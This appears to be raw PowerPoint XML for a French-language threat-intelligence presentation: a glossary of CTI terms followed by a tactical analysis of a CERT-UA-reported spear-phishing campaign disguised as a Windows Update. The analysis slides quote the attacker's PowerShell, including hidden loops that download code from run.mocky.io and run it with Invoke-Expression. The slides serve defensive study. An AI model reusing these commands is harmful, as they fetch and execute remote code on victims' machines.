                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Operations offensives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Operations défensives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Opération d’influence (manipulation de l’information, désinformation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cyber renseignements et reconnaissance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8E2EAF-9AF5-AFBC-045F-A399F23C73FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043608" y="4413778"/>
            <a:ext cx="62644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Plusieurs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>termes et concepts stratégiques militaires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sont utilisés </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pour décrire divers aspects de ces opérations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	- DMZ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	-Périmètre défensif</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	-Armer un exploit (« </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>weaponising</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> »), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935A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5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DictionNaire CTI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0FB2C80-503C-F485-0EF6-898840AB6F01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="88027" y="1724893"/>
            <a:ext cx="9205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1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Actors </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Adversaires/Acteurs malicieux): Personnes, organisations ou pays qui mènent </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>des cyberattaques ou qui constituent une menace pour la cybersécurité. (Hackers, syndicats </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’e-crime, groupes parrainés par l'État, hacktivistes)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2DEE66-B030-504B-5CB7-C6DB97DCE6C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="106973" y="2774197"/>
            <a:ext cx="852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935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Attribution </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Processus d'identification et d'attribution d'une cyberattaque à un acteur </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ou à une entité spécifique responsable de l'attaque.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1F19380-25BB-4494-3FAA-26AD0F9C7E14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="125500" y="3609613"/>
            <a:ext cx="8726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3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Situational</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Awareness</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Connaissance de la situation) : Capacité à comprendre la posture </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de la cybersécurité, (paysage des menaces, vulnérabilités, attaques en cours, risques </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>potentiels). Implique une surveillance, une analyse et une évaluation continues du </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cyber environnement.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8E2D79F-6BEF-4961-AA39-B2ACE9ED07FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="166980" y="4925344"/>
            <a:ext cx="868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4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Defense-In-Depth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (Défense en profondeur) : Mettre en œuvre plusieurs couches de </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contrôles de sécurité et de contre-mesures pour protéger les actifs et les systèmes critiques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Le but est de créer de la friction pour l’adversaire et de lui imposer des coûts.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119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CTI - les definitions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09.06.2023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DictionNaire CTI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2DEE66-B030-504B-5CB7-C6DB97DCE6C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="113918" y="2559499"/>
            <a:ext cx="9024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fr-FR" sz="1800" b="1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Team/Blue Team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800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La Red Team représente le côté offensif simulant </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800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mode opératoire (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" i="1" dirty="0" err="1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TTPs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800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des attaquants. La Blue Team représente le côté défensif, chargé de </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800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détecter et de répondre aux attaques du Red Team.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9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1F19380-25BB-4494-3FAA-26AD0F9C7E14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="125500" y="3609613"/>
            <a:ext cx="8954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7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Defence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Défense Active) : Fait référence aux mesures proactives prises pour contrer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ou perturber les menaces cyber.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8E2D79F-6BEF-4961-AA39-B2ACE9ED07FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="113918" y="5187921"/>
            <a:ext cx="863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9. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Intel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Renseignement sur les menaces) : Le processus de collecte, d'analyse et de </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>partage d'informations sur les cybermenaces potentielles (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TTPs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IOCs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>).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9A619B-EFD4-95D4-B6EB-EF95011CEB28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="113918" y="1759925"/>
            <a:ext cx="869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5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Incident </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Réponse aux incidents) : L'approche structurée pour traiter et gérer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>les incidents de cybersécurité. (détecter, analyser, contenir, éradiquer, récupérer).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3E8864-EA7B-4D01-990C-83550889C7EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="125500" y="4364671"/>
            <a:ext cx="872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8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Cyber </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deterrence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Cyber Dissuasion): L'utilisation des capacités cyber pour dissuader les </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>adversaires potentiels de mener des activités malveillantes.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1200413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CTI – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>l’exemple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09.06.2023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Team@oodrive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13275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L’incident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8067CE-76CD-6DDA-323B-DA9581F717D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="253515" y="1640293"/>
            <a:ext cx="3670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935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>24.04.2023</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – CERT-UA publie un bulletin d’alerte (CERT-UA#6562) concernant une intrusion </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>à la suite d’une campagne de « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>spear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> phishing » ciblant des personnalités gouvernementales.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A88999C-13D6-5968-2932-BD6F9829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765" y="1515633"/>
            <a:ext cx="4010585" cy="169568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53FB38C-1DC1-B609-3D46-08317AB9EBFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="4149080"/>
            <a:ext cx="7833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Le sujet des mails d’harponnage est « Windows Update » avec comme expéditeur </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>« AdminSupport.gov.ua@outlook.com »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5C8A38-5C3A-1E78-2C0C-49E016AD586A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="5373216"/>
            <a:ext cx="525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L’expéditeur prétend être l’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>administrateur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> du système</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="76761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ANALYSE TACTIQUE – phase 1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C86970-268F-5FB9-3724-1A896ECB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21" y="1833340"/>
            <a:ext cx="6961792" cy="26745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0F87B6B-F604-3615-FFA6-D2EFF6A12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650532"/>
            <a:ext cx="6270851" cy="102455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CC5593F-9BE1-65C1-956E-C91728620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087" y="3393416"/>
            <a:ext cx="3305636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06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ANALYSE TACTIQUE – phase 1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E6FF18-E355-9479-5663-01F597F0C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98442"/>
            <a:ext cx="5067744" cy="47491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8BA3A24-FF06-D06B-3700-F33458FF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767084"/>
            <a:ext cx="5067745" cy="18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00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ANALYSE TACTIQUE – phase 2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10948A-3575-1AF1-7D5C-E7C06B6A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78804"/>
            <a:ext cx="7435394" cy="486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26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ANALYSE TACTIQUE – phase 2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839C691-3AD0-34FB-6323-CA8FE391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586341"/>
            <a:ext cx="849694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powershell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 $update='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windows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$url='https://www.catalog.update.microsoft.com/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scopedviewinline.aspx?updateid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=a4b6625c-226e-4dbc-baec-1dbd854b8015’;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$command='run’;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$version='v3’;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$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updateid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='3b44f33d-b6e5-4ec6-b120-99b6ac52f74b’;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$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scheme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='http://’;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$url=$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scheme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+$command+'.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mocky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[.]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io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/'+$version+'/'+$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updateid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$r=(new-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object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system.net.webclient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).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downloadstring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($url);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powershell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 $r;&amp;exit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7FF524-5BF6-E0D4-0746-28C36658DA7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="4579095"/>
            <a:ext cx="847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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="18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http://run.mocky.io/v3/3b44f33d-b6e5-4ec6-b120-99b6ac52f74b</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="18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; &amp;exit</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" altLang="fr-FR" sz="8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fr-FR" altLang="fr-FR" sz="40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D9539A6-53B7-54A4-4099-2B52B91CC02D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="12" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4499992" y="3833110"/>
            <a:ext cx="0" cy="6760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936FE68-E417-DA7F-98FE-DAD7DF274399}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547664" y="5373216"/>
            <a:ext cx="4518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Omniprésent dans l’environnements Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exécution en mémoire</a:t>
            </a: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2A0AC90A-9053-5C9E-E0BA-9ADB8DC6E9C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="20" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="838109" y="4986827"/>
            <a:ext cx="771038" cy="648072"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575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CB2AD5-C78F-FDA3-055B-93F7A317A5F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547664" y="5373216"/>
            <a:ext cx="0" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="935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3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ANALYSE TACTIQUE – phase 2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CA3AA1-916B-05C1-5E2A-20C97259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74" y="1676615"/>
            <a:ext cx="7272300" cy="31472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B3AAA76-C56B-A49F-7CCB-69F5FD0B3874}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643240" y="5264237"/>
            <a:ext cx="804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935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mocking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- processus de simulation ou d'imitation du comportement d'une API </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>à des fins de test ou de développement.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="900468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ANALYSE TACTIQUE – phase 2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105E2B-81F4-E00F-97E8-4011ACD85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94658"/>
            <a:ext cx="7380312" cy="865278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0D2019C-7109-D9F7-FE74-F35244350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644708"/>
            <a:ext cx="856837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start-process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powershell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WindowStyle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hidden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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	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while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(1)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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	         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$R=(New-Object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System.Net.WebClient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).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DownloadString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('http://run.mocky.io/v3/ef4c7798-fc09-42cd-8431-91a22d5728d9’);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                                  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Invoke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-Expression $R;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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                   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Sleep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-s 300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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                           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100" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9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$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host.UI.RawUI.WindowTitle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='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Updating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 Windows’;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for($i=0;$i -le 100;$i++)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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	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Start-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Sleep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 -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Milliseconds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 10000;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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
